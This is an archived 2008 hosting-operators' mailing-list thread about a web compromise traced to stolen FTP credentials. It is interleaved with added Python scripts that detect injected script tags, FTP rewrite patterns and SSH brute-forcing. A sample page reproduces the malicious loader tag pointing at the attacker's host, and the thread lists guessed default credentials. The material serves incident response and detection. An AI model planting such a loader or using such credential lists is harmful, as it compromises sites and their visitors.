Hi,

We have had only a single site compromised so far but googling around indicates that this particular hack is all over the place.

On the site in question all files .htm, .html and .shtml have had code added before the </body> tag, the code is a <jscript></jscript> that loads fgg.js from http://www.usaadw.com, the script that is loaded then tries to open an iframe but the content gives a 500 server error.

I cannot identify the vector used to edit all the files. This is on a linux server running apache 2 but google finds plenty of .asp pages that have been attached as well. The script is also called ngg.js but has almost identical content.

Has anyone else been hit and if so, has the vector been identified?

Any assistance appreciated.

--
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
Glen and Rosanne Eustace
GodZone Internet Services, a division of AGRE Enterprises Ltd.
P.O. Box 8020, Palmerston North, New Zealand 4446.
Ph: +64 6 357 8168, Fax +64 6 357 8165, Mob: +64 21 424 015
http://www.godzone.net.nz
"A Ministry specialising in providing low-cost Internet Services to NZ Christian Churches, Ministries and Organisations."
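As an added example (not part of the thread), here is the kind of scanner a host would run over a document root to find and remove the planted include. It assumes the injected code is a standard external script element of the form `<script src="http://www.usaadw.com/fgg.js"></script>` sitting directly before `</body>`, as described above; the `TRUSTED_HOSTS` allowlist and the sample page are constructed for illustration.

```python
"""Scan static HTML for external script tags planted immediately before </body>."""
import re
import sys
from pathlib import Path
from urllib.parse import urlparse

# Hosts this site legitimately loads scripts from (assumption: adjust per site).
TRUSTED_HOSTS = {"www.godzone.net.nz"}

# An external <script src=...></script> element with no inline body.
SCRIPT_RE = re.compile(
    r"<script\b[^>]*\bsrc\s*=\s*[\"']?([^\"'\s>]+)[^>]*>\s*</script>",
    re.IGNORECASE,
)
BODY_CLOSE_RE = re.compile(r"</body\s*>", re.IGNORECASE)


def injected_scripts(html):
    """Return (src, host, before_body) for each external script whose host is not trusted.

    before_body is True when only whitespace separates the tag from </body>,
    which is where this particular hack appends its loader.
    """
    body_close = BODY_CLOSE_RE.search(html)
    findings = []
    for m in SCRIPT_RE.finditer(html):
        src = m.group(1)
        host = urlparse(src).hostname
        if host is None or host.lower() in TRUSTED_HOSTS:
            continue  # relative or same-site include: not what we are hunting
        before_body = body_close is not None and html[m.end():body_close.start()].strip() == ""
        findings.append((src, host.lower(), before_body))
    return findings


def strip_scripts(html, hosts):
    """Remove script tags whose src host is in `hosts`; return (cleaned_html, removed_count)."""
    hosts = {h.lower() for h in hosts}
    removed = 0

    def repl(m):
        nonlocal removed
        host = (urlparse(m.group(1)).hostname or "").lower()
        if host in hosts:
            removed += 1
            return ""
        return m.group(0)

    return SCRIPT_RE.sub(repl, html), removed


def scan_tree(root, suffixes=(".htm", ".html", ".shtml")):
    """Map path -> findings for every static page under `root` that carries an untrusted include."""
    hits = {}
    for path in Path(root).rglob("*"):
        if path.is_file() and path.suffix.lower() in suffixes:
            found = injected_scripts(path.read_text(errors="replace"))
            if found:
                hits[str(path)] = found
    return hits


# Constructed sample page (not a capture of the infected site).
SAMPLE = """<html><body>
<h1>Welcome</h1>
<script src="/js/menu.js"></script>
<script src="http://www.usaadw.com/fgg.js"></script>
</body></html>"""

if __name__ == "__main__":
    root = sys.argv[1] if len(sys.argv) > 1 else "."
    for path, found in scan_tree(root).items():
        for src, host, before_body in found:
            where = "immediately before </body>" if before_body else "elsewhere in page"
            print(f"{path}: {src} ({where})")
```

Run it against the document root before restoring from backup so you have a file list to compare with the FTP transfer log; `strip_scripts` is only for cases where no clean backup exists, since it removes the loader but cannot tell you what else was changed.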
Appears to have originated from SQL injections.

http://infosec20.blogspot.com/2008/07/asprox-payload-morphed.html

Kind regards,
Truman

On 13/07/2008, at 10:59 PM, Glen Eustace wrote:
> Hi,
>
> We have had only a single site compromised so far but googling around indicates that this particular hack is all over the place.
>
> On the site in question all files .htm, .html and .shtml have had code added before the </body> tag, the code is a <jscript></jscript> that loads fgg.js from http://www.usaadw.com, the script that is loaded then tries to open an iframe but the content gives a 500 server error.
>
> I cannot identify the vector used to edit all the files. This is on a linux server running apache 2 but google finds plenty of .asp pages that have been attached as well. The script is also called ngg.js but has almost identical content.
>
> Has anyone else been hit and if so, has the vector been identified?
>
> Any assistance appreciated.
OK, vector identified.

The password for the site was cracked, then the site was downloaded, modified and then uploaded again. This happened concurrently from two sources.

Sat Jul 12 18:37:19 2008 1 85.114.85.233 3711 /index_bak/index_js.shtml b _ o r xxxxx ftp 0 * c
Sat Jul 12 18:37:23 2008 2 85.114.85.233 3761 /index_bak/index_js.shtml b _ i r xxxxx ftp 0 * c
Sat Jul 12 18:37:27 2008 1 85.114.85.233 2693 /index_bak/try3.shtml b _ o r xxxxx ftp 0 * c
Sat Jul 12 18:37:31 2008 2 85.114.85.233 2743 /index_bak/try3.shtml b _ i r xxxxx ftp 0 * c
S

Intermingled with this were records indicating the same behaviour from 116.71.41.118

So whilst earlier attacks have been via SQL injection, this is another vector to look for/be aware of.

--
Glen Eustace
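The transfer log above is in the standard xferlog layout (wu-ftpd/ProFTPD: timestamp, transfer time, remote host, size, path, type, special flag, direction, access mode, user, service, auth method, auth user, completion status). As an added example that is not from the thread, the following parses that format and flags the pull-modify-push pattern: the same host downloading a file and re-uploading it seconds later, plus a single account being used from more than one address. The four log lines are the ones quoted above; the fifth is a constructed benign upload from a documentation-range address for contrast.

```python
"""Find the download-then-upload rewrite pattern in an xferlog (wu-ftpd/ProFTPD format)."""
from collections import defaultdict
from datetime import datetime, timedelta


def parse_xferlog_line(line):
    """Parse one xferlog record into a dict. Raises ValueError on anything else."""
    tokens = line.split()
    if len(tokens) < 18:
        raise ValueError(f"not an xferlog record: {line!r}")
    # tokens[0:5] is the timestamp, e.g. "Sat Jul 12 18:37:19 2008"
    when = datetime.strptime(" ".join(tokens[:5]), "%a %b %d %H:%M:%S %Y")
    return {
        "time": when,
        "host": tokens[6],
        "size": int(tokens[7]),
        "file": tokens[8],
        "direction": tokens[11],  # 'o' = sent to client (download), 'i' = received (upload)
        "user": tokens[13],
        "status": tokens[17],     # 'c' complete, 'i' incomplete
    }


def find_rewrites(records, window=timedelta(minutes=5)):
    """Return (host, user, file, gap_seconds, size_delta) for each file a host downloaded
    and then re-uploaded within `window`. A positive size_delta on every file is what an
    appended script tag looks like."""
    last_download = {}
    hits = []
    for r in sorted(records, key=lambda r: r["time"]):
        if r["status"] != "c":
            continue
        key = (r["host"], r["user"], r["file"])
        if r["direction"] == "o":
            last_download[key] = (r["time"], r["size"])
        elif r["direction"] == "i" and key in last_download:
            when, size = last_download[key]
            gap = r["time"] - when
            if gap <= window:
                hits.append((r["host"], r["user"], r["file"],
                             int(gap.total_seconds()), r["size"] - size))
    return hits


def hosts_per_user(records):
    """Map username -> set of source hosts. One site account driven from several
    addresses at once is exactly the 'concurrently from two sources' case."""
    seen = defaultdict(set)
    for r in records:
        seen[r["user"]].add(r["host"])
    return dict(seen)


def analyse(text):
    records = [parse_xferlog_line(l) for l in text.splitlines() if l.strip()]
    return find_rewrites(records), hosts_per_user(records)


# First four lines: the records quoted in the thread. Last line: constructed benign upload.
SAMPLE_LOG = """\
Sat Jul 12 18:37:19 2008 1 85.114.85.233 3711 /index_bak/index_js.shtml b _ o r xxxxx ftp 0 * c
Sat Jul 12 18:37:23 2008 2 85.114.85.233 3761 /index_bak/index_js.shtml b _ i r xxxxx ftp 0 * c
Sat Jul 12 18:37:27 2008 1 85.114.85.233 2693 /index_bak/try3.shtml b _ o r xxxxx ftp 0 * c
Sat Jul 12 18:37:31 2008 2 85.114.85.233 2743 /index_bak/try3.shtml b _ i r xxxxx ftp 0 * c
Sat Jul 12 09:02:10 2008 3 203.0.113.7 18204 /images/banner.jpg b _ i r xxxxx ftp 0 * c
"""

if __name__ == "__main__":
    rewrites, by_user = analyse(SAMPLE_LOG)
    for host, user, path, gap, delta in rewrites:
        print(f"{host} ({user}) re-uploaded {path} {gap}s after downloading it, {delta:+d} bytes")
    for user, hosts in by_user.items():
        if len(hosts) > 1:
            print(f"account {user} used from {len(hosts)} hosts: {', '.join(sorted(hosts))}")
```

Both rewrites in the quoted log grew by exactly 50 bytes, which is a useful secondary indicator: a legitimate edit rarely changes every file by the same amount.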
On Mon, 14 Jul 2008 19:16:13 +1200 Glen Eustace wrote:

> OK, vector identified.
>
> The password for the site was cracked, then the site was downloaded, modified and then uploaded again. This happened concurrently from two sources.
My pet hate is all these designers who just must have ftp access. Don't they realise that the ftp password is transferred in clear text over the internet? sftp is no big deal to set up either end.
Steve.
--
Steve Holdoway
On 14/07/2008, at 9:44 PM, Steve Holdoway wrote:

> On Mon, 14 Jul 2008 19:16:13 +1200 Glen Eustace wrote:
>
>> OK, vector identified.
>>
>> The password for the site was cracked, then the site was downloaded, modified and then uploaded again. This happened concurrently from two sources.
>
> My pet hate is all these designers who just must have ftp access. Don't they realise that the ftp password is transferred in clear text over the internet? sftp is no big deal to set up either end.
Secure FTP doesn't save people who have poorly chosen passwords, which I imagine is what happened in this case, and is, in my opinion, a much more likely to be exploited problem than unencrypted FTP.

--
Nathan Ward
On Mon, 14 Jul 2008 21:59:30 +1200 Nathan Ward wrote:

> On 14/07/2008, at 9:44 PM, Steve Holdoway wrote:
>
>> On Mon, 14 Jul 2008 19:16:13 +1200 Glen Eustace wrote:
>>
>>> OK, vector identified.
>>>
>>> The password for the site was cracked, then the site was downloaded, modified and then uploaded again. This happened concurrently from two sources.
>>
>> My pet hate is all these designers who just must have ftp access. Don't they realise that the ftp password is transferred in clear text over the internet? sftp is no big deal to set up either end.
>
> Secure FTP doesn't save people who have poorly chosen passwords, which I imagine is what happened in this case, and is, in my opinion, a much more likely to be exploited problem than unencrypted FTP.
>
> --
> Nathan Ward
As it doesn't expose the account name either, it makes guessing the password infinitely more difficult. Also, by disabling ftp altogether, you've confused the script kiddies already. I suppose running sftp on port 21 would make them really mad!
Just my opinion (:
Steve
--
Steve Holdoway
Nathan Ward wrote:

> On 14/07/2008, at 9:44 PM, Steve Holdoway wrote:
>
>> On Mon, 14 Jul 2008 19:16:13 +1200 Glen Eustace wrote:
>>
>>> OK, vector identified.
>>>
>>> The password for the site was cracked, then the site was downloaded, modified and then uploaded again. This happened concurrently from two sources.
>>
>> My pet hate is all these designers who just must have ftp access. Don't they realise that the ftp password is transferred in clear text over the internet? sftp is no big deal to set up either end.
>
> Secure FTP doesn't save people who have poorly chosen passwords, which I imagine is what happened in this case, and is, in my opinion, a much more likely to be exploited problem than unencrypted FTP.
>
> --
> Nathan Ward
</lurk> I agree, slack passwords are a cracker's delight :) <lurk>
Tom the Lurker wrote:

> Nathan Ward wrote:
>
>> On 14/07/2008, at 9:44 PM, Steve Holdoway wrote:
>>
>>> My pet hate is all these designers who just must have ftp access. Don't they realise that the ftp password is transferred in clear text over the internet? sftp is no big deal to set up either end.
>>
>> Secure FTP doesn't save people who have poorly chosen passwords, which I imagine is what happened in this case, and is, in my opinion, a much more likely to be exploited problem than unencrypted FTP.
>
> I agree, slack passwords are a cracker's delight :)
And if you're not watching/analyzing your logs, it's very easy to miss someone trying passwords.

I had a case where a customer's site had a backup DSL link, which wasn't really used. We got a cacti threshold alert that said "DSL link using four times as much as last week!!!" (400 bytes/sec). Turned out that someone was trying all manner of usernames/passwords against an AS/400 running an FTP server. And it had been going on for hours. The usernames/passwords were anything from simple admin/root/ftpuser/jim/bob/mary through to obfuscated things like r00t/5up3ru53r/passw0rd/3TC...

Who's going to notice an extra 400 bytes/sec on a busy link, other than by monitoring logs for denied requests?

--
Criggie
http://criggie.dyndns.org/
On Tue, 15 Jul 2008 08:02:34 +1200 Criggie wrote:

> Tom the Lurker wrote:
>
>> Nathan Ward wrote:
>>
>>> On 14/07/2008, at 9:44 PM, Steve Holdoway wrote:
>>>
>>>> My pet hate is all these designers who just must have ftp access. Don't they realise that the ftp password is transferred in clear text over the internet? sftp is no big deal to set up either end.
>>>
>>> Secure FTP doesn't save people who have poorly chosen passwords, which I imagine is what happened in this case, and is, in my opinion, a much more likely to be exploited problem than unencrypted FTP.
>>
>> I agree, slack passwords are a cracker's delight :)
>
> And if you're not watching/analyzing your logs, it's very easy to miss someone trying passwords.
>
> I had a case where a customer's site had a backup DSL link, which wasn't really used. We got a cacti threshold alert that said "DSL link using four times as much as last week!!!" (400 bytes/sec). Turned out that someone was trying all manner of usernames/passwords against an AS/400 running an FTP server. And it had been going on for hours. The usernames/passwords were anything from simple admin/root/ftpuser/jim/bob/mary through to obfuscated things like r00t/5up3ru53r/passw0rd/3TC...
>
> Who's going to notice an extra 400 bytes/sec on a busy link, other than by monitoring logs for denied requests?
>
> --
> Criggie
I don't, but I run logcheck to *tell* me (and fcheck to tell me of any file changes, and...)!

tbh my production servers have a backdoor single account ssh access to the internet, which is protected by denyhosts, and all other access is from a staging server via vpn, still using secure (but separate) protocols. I don't care too much about the shortcomings of denyhosts, as a) it's protecting the emergency backup service, and b) I've got enough static ip addresses whitelisted to get in from - imo it's perfect for this job.

OK, you *could* break in through a distributed attack on the ssh port, but the real risk to my servers is now human, from those with the relevant knowledge of the network configuration. But to me the chances of someone looking for a starting point 9000 miles from the server, breaking in, then going through a few other hoops before hacking across the vpn to the production server are remote enough to put it a long way down my list.

And, of course, I'm lucky enough not to have to support 1903 vintage IBM boat anchors (:

Steve
On Tue, 15 Jul 2008 08:34:17 +1200 Steve Holdoway wrote:

> I don't, but I run logcheck to *tell* me (and fcheck to tell me of any file changes, and...)!
>
> tbh my production servers have a backdoor single account ssh access to the internet, which is protected by denyhosts, and all other access is from a staging server via vpn, still using secure (but separate) protocols. I don't care too much about the shortcomings of denyhosts, as a) it's protecting the emergency backup service, and b) I've got enough static ip addresses whitelisted to get in from - imo it's perfect for this job.
>
> OK, you *could* break in through a distributed attack on the ssh port, but the real risk to my servers is now human, from those with the relevant knowledge of the network configuration. But to me the chances of someone looking for a starting point 9000 miles from the server, breaking in, then going through a few other hoops before hacking across the vpn to the production server are remote enough to put it a long way down my list.
>
> And, of course, I'm lucky enough not to have to support 1903 vintage IBM boat anchors (:
>
> Steve
Just to follow this up from this morning...

From Logcheck...

Jul 15 07:16:54 server sshd[8129]: Failed password for invalid user hipcomix from 207.210.107.2 port 34553 ssh2
Jul 15 07:16:54 server sshd[8132]: Failed password for root from 207.210.107.2 port 34566 ssh2
Jul 15 07:16:55 server sshd[8134]: Failed password for invalid user jpeger from 207.210.107.2 port 34582 ssh2
Jul 15 07:16:55 server sshd[8139]: Failed password for invalid user favs from 207.210.107.2 port 34606 ssh2

and a few more...

From Denyhosts...

Date: Tue, 15 Jul 2008 07:17:00 +1200

Added the following hosts to /etc/hosts.deny:

207.210.107.2 (unknown)

Steve
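Criggie's point that a password-guessing run is easy to miss without log analysis, and the logcheck/denyhosts output Steve shows above, both come down to the same detection: count authentication failures per source address inside a time window and act when a threshold is crossed. As an added example that is not part of the thread (and not denyhosts' own code), the following does that over syslog-style sshd lines. The first four log lines are the ones Steve posted; the remaining lines are constructed to exercise the threshold and the case a thresholding tool alone will not alert on, a successful login from an address that has just been failing, which is the one you actually want to be paged for.

```python
"""Threshold failed sshd logins per source address, denyhosts/fail2ban style."""
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Matches both "Failed password for invalid user NAME from IP" and
# "Failed/Accepted password for NAME from IP" as written by OpenSSH to syslog.
AUTH_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d{1,2} \d{2}:\d{2}:\d{2}) \S+ sshd\[\d+\]: "
    r"(?P<result>Failed|Accepted) password for (?:invalid user )?(?P<user>\S+) "
    r"from (?P<ip>\d{1,3}(?:\.\d{1,3}){3}) port \d+"
)


def parse_auth_line(line, year=2008):
    """Return (time, result, user, ip) or None. syslog omits the year, so it is supplied."""
    m = AUTH_RE.match(line)
    if not m:
        return None
    ts = datetime.strptime(f"{m['ts']} {year}", "%b %d %H:%M:%S %Y")
    return ts, m["result"], m["user"], m["ip"]


def brute_force_report(lines, threshold=5, window=timedelta(minutes=10), year=2008):
    """Return ({ip: peak_failures_in_window}, [(ip, user), ...]).

    The dict lists sources that reached `threshold` failures inside `window`
    (what denyhosts would add to hosts.deny). The list records an Accepted login
    from an address that still has failures inside its window: a guess that worked.
    """
    recent = defaultdict(deque)  # ip -> timestamps of failures still inside the window
    flagged = {}
    suspicious_success = []
    for line in lines:
        parsed = parse_auth_line(line, year)
        if parsed is None:
            continue
        ts, result, user, ip = parsed
        q = recent[ip]
        while q and ts - q[0] > window:
            q.popleft()  # slide the window forward
        if result == "Failed":
            q.append(ts)
            if len(q) >= threshold:
                flagged[ip] = max(flagged.get(ip, 0), len(q))
        elif q:
            suspicious_success.append((ip, user))
    return flagged, suspicious_success


# First four lines: as posted above. The rest are constructed for this example.
SAMPLE_AUTH_LOG = """\
Jul 15 07:16:54 server sshd[8129]: Failed password for invalid user hipcomix from 207.210.107.2 port 34553 ssh2
Jul 15 07:16:54 server sshd[8132]: Failed password for root from 207.210.107.2 port 34566 ssh2
Jul 15 07:16:55 server sshd[8134]: Failed password for invalid user jpeger from 207.210.107.2 port 34582 ssh2
Jul 15 07:16:55 server sshd[8139]: Failed password for invalid user favs from 207.210.107.2 port 34606 ssh2
Jul 15 07:16:56 server sshd[8141]: Failed password for invalid user test from 207.210.107.2 port 34620 ssh2
Jul 15 07:16:56 server sshd[8143]: Failed password for root from 207.210.107.2 port 34631 ssh2
Jul 15 07:16:57 server sshd[8145]: Accepted password for backup from 207.210.107.2 port 34640 ssh2
Jul 15 07:20:01 server sshd[8201]: Failed password for steve from 192.0.2.10 port 51022 ssh2
"""

if __name__ == "__main__":
    flagged, successes = brute_force_report(SAMPLE_AUTH_LOG.splitlines())
    for ip, count in flagged.items():
        print(f"block {ip}: {count} failures inside window")
    for ip, user in successes:
        print(f"ALERT {ip}: successful login as {user} after failures")
```

Feed it `/var/log/auth.log` (or whatever your syslog facility writes) and treat the second list as an incident, not a statistic: blocking the address after the fact does nothing about the session that is already open.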
The plot thickens, as they say.

There is no evidence of multiple attempts to get in via ftp. The userid was not something that would be easily guessed; can't comment on the password as I don't know what it was.

The user and password would appear to have been obtained and used.

From communications with the account holder, it would appear, though unconfirmed at this stage, that someone who had legitimate access to the site *MAY* have done something they would prefer not to admit to.

I am guessing a case of social engineering or similar. So in this case, the protocol used may be irrelevant.

--
Glen Eustace
I'd like to take a mo and thank Glen for being so open with the details of this recent event. I would suspect that this happens a whole lot more than any of us hear about and it's good to get cases out in the open.

I lose count of the number of clients I talk to about security who come back and say "Oh that stuff never happens, it's all in the movies". It would be good if more people were aware of what the real danger/risk was.

So thanks Glen! Well done!

Dean

Glen Eustace wrote:
> The plot thickens, as they say.
>
> There is no evidence of multiple attempts to get in via ftp. The userid was not something that would be easily guessed; can't comment on the password as I don't know what it was.
>
> The user and password would appear to have been obtained and used.
>
> From communications with the account holder, it would appear, though unconfirmed at this stage, that someone who had legitimate access to the site *MAY* have done something they would prefer not to admit to.
>
> I am guessing a case of social engineering or similar. So in this case, the protocol used may be irrelevant.
> From communications with the account holder, it would appear, though unconfirmed at this stage, that someone who had legitimate access to the site *MAY* have done something they would prefer not to admit to.

Whilst I am still unable to say 100%, given the timing etc. and what I have found (which admittedly isn't much) about the malware concerned, it would seem that the unfortunate individual had a run-in with VirusRemover 2008. He is now $155.00 worse off and a few of us have had a cleanup to complete.

--
Glen Eustace
participants (7)

- Criggie
- Dean Pemberton
- Glen Eustace
- Nathan Ward
- Steve Holdoway
- Tom
- Truman Boyes